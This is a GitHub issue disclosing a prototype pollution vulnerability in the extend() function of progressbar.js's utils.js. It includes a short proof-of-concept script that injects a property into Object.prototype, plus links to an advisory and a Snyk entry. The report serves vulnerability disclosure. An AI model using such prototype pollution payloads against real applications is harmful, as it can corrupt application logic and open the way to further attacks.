Prototype Pollution using extend() in utils.js
lelecolacola123 opened this issue · comments
Hi!There's a prototype pollution vulnerability in function extend() in the file utils.js.Affected versions of this package are vulnerable to Prototype Pollution which can allow an attacker to add/modify properties of the Object.prototype.the risk locate is in here:
Line 20 in 74536b9
Line 18 in 74536b9
and the POC is as follow:
var progressbar = require("progressbar.js")
BAD_JSON = JSON.parse('{"proto":{"test":123}}');
console.log("Before"+{}.test)
progressbar.utils.extend({},BAD_JSON,{})
console.log("After"+{}.test)
More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf
Github just published this vulnerability here: GHSA-89qm-hm2x-mxm3
Also being registered by Synk scan https://security.snyk.io/vuln/SNYK-JS-PROGRESSBARJS-3184152